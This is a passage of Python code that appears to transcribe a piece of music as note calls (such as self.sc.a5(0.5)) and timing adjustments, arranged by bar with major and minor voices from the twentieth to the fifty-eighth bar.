self.sc.e6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(1)
self.sc.modify_time(1, 1)
self.sc.d4(1)
self.sc.a4(1)
self.sc.f5(0.5)
self.sc.e5(0.5)
self.sc.d5(0.5)
self.sc.c5(0.5)
self.sc.a2(1)
self.sc.modify_time(1, 1)
self.sc.a3(1)
self.sc.e3(1)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.c4(0.5)
self.sc.b3(0.5)
# -------- twentieth bar -------- #
# ---- major ---- #
self.sc.d6(0.5)
self.sc.f5(0.5)
self.sc.c6(0.5)
self.sc.f5(0.5)
self.sc.b5(0.5)
self.sc.f5(0.5)
self.sc.a5(0.5)
self.sc.f5(0.5)
self.sc.f5(1)
self.sc.f5(1)
self.sc.e5(2)
self.sc.modify_time(4, 1)
self.sc.g5s(1)
self.sc.a5(1)
self.sc.b5(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.b2(1)
self.sc.modify_time(1, 1)
self.sc.b3(1)
self.sc.f4(1)
self.sc.b4(1)
self.sc.modify_time(1, 1)
self.sc.d5(1)
self.sc.f4(1)
self.sc.d4(1)
self.sc.c4(1)
self.sc.b3(1)
self.sc.e3(1)
self.sc.modify_time(4, 1)
self.sc.d5(1)
self.sc.c5(1)
self.sc.b4(1)
self.sc.e4(1)
# -------- twenty-first bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- twenty-second bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.e4(1)
self.sc.g3(1)
# -------- twenty-third bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- twenty-fourth bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(4)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(2)
# -------- twenty-fifth bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- twenty-sixth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.e7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.a4(1)
self.sc.e4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.e4(1)
# -------- twenty-seventh bar -------- #
# ---- major ---- #
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.d7(1)
self.sc.d7(0.333)
self.sc.e7(0.333)
self.sc.d7(0.333)
self.sc.b6(1)
self.sc.g6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- twenty-eighth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.a5(1)
self.sc.modify_time(1, 1)
self.sc.c6(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- twenty-ninth bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- thirtieth bar -------- #
# ---- major ---- #
self.sc.b5(1)
self.sc.b5(1)
self.sc.modify_time(2, 1)
self.sc.d6(1)
self.sc.g6s(1)
self.sc.a6(1)
self.sc.b6(1)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.b5(0.5)
# time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(1)
self.sc.modify_time(1, 1)
self.sc.a4(1)
self.sc.e4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.e4(1)
# -------- thirty-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
# time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.c4(1)
self.sc.f4(2)
self.sc.modify_time(2, 1)
self.sc.a4(2)
self.sc.g3(1)
self.sc.d4(1)
self.sc.g4(2)
self.sc.modify_time(2, 1)
self.sc.b4(2)
# -------- thirty-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(1)
self.sc.b4(1)
self.sc.c5s(3)
self.sc.a4(1)
# -------- thirty-third bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.b4(0.5)
self.sc.d5(0.5)
self.sc.g5(1)
self.sc.d5(1)
# -------- thirty-fourth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.e7(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.c5(0.5)
self.sc.e5(1)
self.sc.a5(1)
# -------- thirty-fifth bar -------- #
# ---- major ---- #
self.sc.e6(2)
self.sc.modify_time(2, 1)
self.sc.a6(2)
self.sc.a6(2)
self.sc.modify_time(2, 1)
self.sc.e7(2)
self.sc.d7(1)
self.sc.d7(0.333)
self.sc.e7(0.333)
self.sc.d7(0.333)
self.sc.b6(1)
self.sc.g6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.a4(0.5)
self.sc.c5(1)
self.sc.f5(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.g4(1)
# -------- thirty-sixth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.b5(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.c5(1)
self.sc.a4(1)
# -------- thirty-seventh bar -------- #
# ---- major ---- #
self.sc.a5(2.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.g5(2)
self.sc.b5(2)
self.sc.modify_time(8, 1)
self.sc.c6(2.5)
self.sc.modify_time(1.5)
self.sc.b5(2)
self.sc.d6(2)
self.sc.modify_time(8, 1)
self.sc.e6(2.5)
self.sc.modify_time(1.5)
self.sc.d6(2)
self.sc.g6(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(1)
self.sc.modify_time(1, 1)
self.sc.f4(1)
self.sc.f4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.f5(1)
self.sc.f4(1)
self.sc.g3(1)
self.sc.modify_time(1, 1)
self.sc.g4(1)
self.sc.b4(0.5)
self.sc.d5(0.5)
self.sc.g5(1)
self.sc.d5(1)
# -------- thirty-eighth bar -------- #
# ---- major ---- #
self.sc.b5(1.5)
self.sc.modify_time(1.5, 1)
self.sc.d6(1.5)
self.sc.b6(0.5)
self.sc.a6(1.5)
self.sc.g6s(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.b5(0.5)
# time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.e4(1)
self.sc.g4s(1)
self.sc.modify_time(1, 1)
self.sc.b4(1)
self.sc.e4(1)
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(1)
self.sc.e5(1)
# -------- thirty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.d7(0.5)
self.sc.e7(0.5)
# time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(1)
self.sc.c4(1)
self.sc.g3(0.5)
self.sc.d4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.b4(1)
self.sc.d4(1)
# -------- fortieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(0.5)
self.sc.e7(0.5)
self.sc.c7s(0.5)
self.sc.e7(0.5)
self.sc.a6(1)
self.sc.e6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5s(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.b5(0.5)
self.sc.c6(2)
self.sc.e4(2)
self.sc.modify_time(2, 1)
self.sc.e5(2)
# -------- forty-first bar -------- #
# ---- major ---- #
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.e6(0.5)
self.sc.c7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.b5(0.5)
self.sc.a6(0.5)
self.sc.b5(0.5)
self.sc.g6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.d5(0.5)
self.sc.e5(1)
self.sc.e3(1)
self.sc.modify_time(1, 1)
self.sc.e4(1)
self.sc.b4(1)
self.sc.e5(1)
self.sc.modify_time(1, 1)
self.sc.g5(1)
self.sc.b4(1)
# -------- forty-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.f6(0.5)
self.sc.c6(0.5)
self.sc.e6(1)
self.sc.e6(0.5)
self.sc.g6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.modify_time(0.5, 1)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(1)
self.sc.c3(1)
self.sc.modify_time(1, 1)
self.sc.c4(1)
self.sc.g4(1)
self.sc.c5(1)
self.sc.modify_time(1, 1)
self.sc.e5(1)
self.sc.g4(1)
# -------- forty-third bar -------- #
# ---- major ---- #
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.a5(0.5)
self.sc.d6(0.5)
self.sc.a5(0.5)
self.sc.f6(0.5)
self.sc.a5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.e6(0.5)
self.sc.e5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(1)
self.sc.modify_time(1, 1)
self.sc.d4(1)
self.sc.a4(1)
self.sc.f5(0.5)
self.sc.e5(0.5)
self.sc.d5(0.5)
self.sc.c5(0.5)
self.sc.a2(1)
self.sc.modify_time(1, 1)
self.sc.a3(1)
self.sc.e3(1)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.c4(0.5)
self.sc.b3(0.5)
# -------- forty-fourth bar -------- #
# ---- major ---- #
self.sc.d6(0.5)
self.sc.f5(0.5)
self.sc.c6(0.5)
self.sc.f5(0.5)
self.sc.b5(0.5)
self.sc.f5(0.5)
self.sc.a5(0.5)
self.sc.f5(0.5)
self.sc.f5(1)
self.sc.f5(1)
self.sc.e5(2)
self.sc.modify_time(4, 1)
self.sc.g5s(1)
self.sc.a5(1)
self.sc.b5(2)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.b2(1)
self.sc.modify_time(1, 1)
self.sc.b3(1)
self.sc.f4(1)
self.sc.b4(1)
self.sc.modify_time(1, 1)
self.sc.d5(1)
self.sc.f4(1)
self.sc.d4(1)
self.sc.c4(1)
self.sc.b3(1)
self.sc.e3(1)
self.sc.modify_time(4, 1)
self.sc.d5(1)
self.sc.c5(1)
self.sc.b4(1)
self.sc.e4(1)
# -------- forty-fifth bar -------- #
# ---- major ---- #
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.c6(0.5)
self.sc.e5(0.5)
self.sc.d6(0.5)
self.sc.e5(0.5)
self.sc.b5(0.5)
self.sc.e5(0.5)
self.sc.a5(0.5)
self.sc.e5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a3(0.5)
self.sc.e4(0.5)
self.sc.a4(0.5)
self.sc.b4(0.5)
self.sc.c5(0.5)
self.sc.b4(0.5)
self.sc.a4(0.5)
self.sc.e4(0.5)
self.sc.e3(1)
self.sc.b3(1)
self.sc.g4(1)
self.sc.b3(1)
# -------- forty-sixth bar -------- #
# ---- major ---- #
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.a5(0.5)
self.sc.c5(0.5)
self.sc.c6(0.5)
self.sc.c5(0.5)
self.sc.g5(0.5)
self.sc.c5(0.5)
self.sc.f5(0.5)
self.sc.c5(0.5)
self.sc.g5(1)
self.sc.e5(0.5)
self.sc.g5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f3(0.5)
self.sc.c4(0.5)
self.sc.f4(0.5)
self.sc.g4(0.5)
self.sc.a4(0.5)
self.sc.g4(0.5)
self.sc.f4(0.5)
self.sc.c4(0.5)
self.sc.c3(1)
self.sc.g3(1)
self.sc.e4(1)
self.sc.g3(1)
# -------- forty-seventh bar -------- #
# ---- major ---- #
self.sc.f5(1)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(1)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.f6(0.5)
self.sc.e6(0.5)
self.sc.d6(0.5)
self.sc.c6(0.5)
self.sc.b5(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(0.5)
self.sc.a3(0.5)
self.sc.d4(0.5)
self.sc.e4(0.5)
self.sc.f4(0.5)
self.sc.e4(0.5)
self.sc.d4(0.5)
self.sc.a3(0.5)
self.sc.a2(0.5)
self.sc.e3(0.5)
self.sc.a3(0.5)
self.sc.b3(0.5)
self.sc.c4(0.5)
self.sc.d4(0.5)
self.sc.e4(1)
# -------- forty-eighth bar -------- #
# ---- major ---- #
self.sc.a5(1)
self.sc.e6(1)
self.sc.g5s(1)
self.sc.e6(1)
self.sc.a5(4)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.d3(2)
self.sc.b2(1.5)
self.sc.a2(0.5)
self.sc.a2(1)
self.sc.modify_time(5, 1)
self.sc.d4(2)
self.sc.b3(1.5)
self.sc.a3(0.5)
self.sc.a3(1)
self.sc.e4(1)
self.sc.a4(2)
# -------- forty-ninth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(2)
self.sc.f5(2)
self.sc.g5(2)
self.sc.e5(2)
# -------- fiftieth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(2)
self.sc.e5(2)
self.sc.a4(2)
self.sc.e5(2)
# -------- fifty-first bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(2)
self.sc.a5(2)
self.sc.g5(2)
self.sc.e5(2)
# -------- fifty-second bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.e7(0.5)
self.sc.e6(0.5)
self.sc.d7(0.5)
self.sc.d6(0.5)
self.sc.c7(2)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(2)
self.sc.e5(2)
self.sc.c6(2)
self.sc.e5(2)
# -------- fifty-third bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(4)
self.sc.g5(2)
self.sc.e5(2)
# -------- fifty-fourth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a5(2)
self.sc.e5(2)
self.sc.c6(2)
self.sc.e5(2)
# -------- fifty-fifth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f5(4)
self.sc.g5(2)
self.sc.e5(2)
# -------- fifty-sixth bar -------- #
# ---- major ---- #
self.sc.a6(6)
self.sc.modify_time(1)
self.sc.a6(1)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.a4(1)
self.sc.e5(1)
self.sc.a5(1)
self.sc.b5(1)
self.sc.c6(1)
self.sc.e5(1)
self.sc.a5(2)
# -------- fifty-seventh bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.a5(0.5)
self.sc.c6(0.5)
self.sc.e6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.e6(0.5)
self.sc.a6(0.5)
self.sc.b6(0.5)
self.sc.d6(0.5)
self.sc.c7(0.5)
self.sc.b6(0.5)
# ---- time correct ---- #
self.sc.modify_time(8, 1)
# ---- minor ---- #
self.sc.f4(1)
self.sc.c5(1)
self.sc.f5(1)
self.sc.c5(1)
self.sc.g4(1)
self.sc.d5(1)
self.sc.g5(1)
self.sc.d5(1)
# -------- fifty-eighth bar -------- #
# ---- major ---- #
self.sc.a6(0.5)
self.sc.c6(0.5)
self.sc.c7(0.5)
self.sc.c6(0.5)
self.sc.b6(0.5)
self.sc.c6(0.5)
self.sc.g6(0.5)
self.sc.c6(0.5)
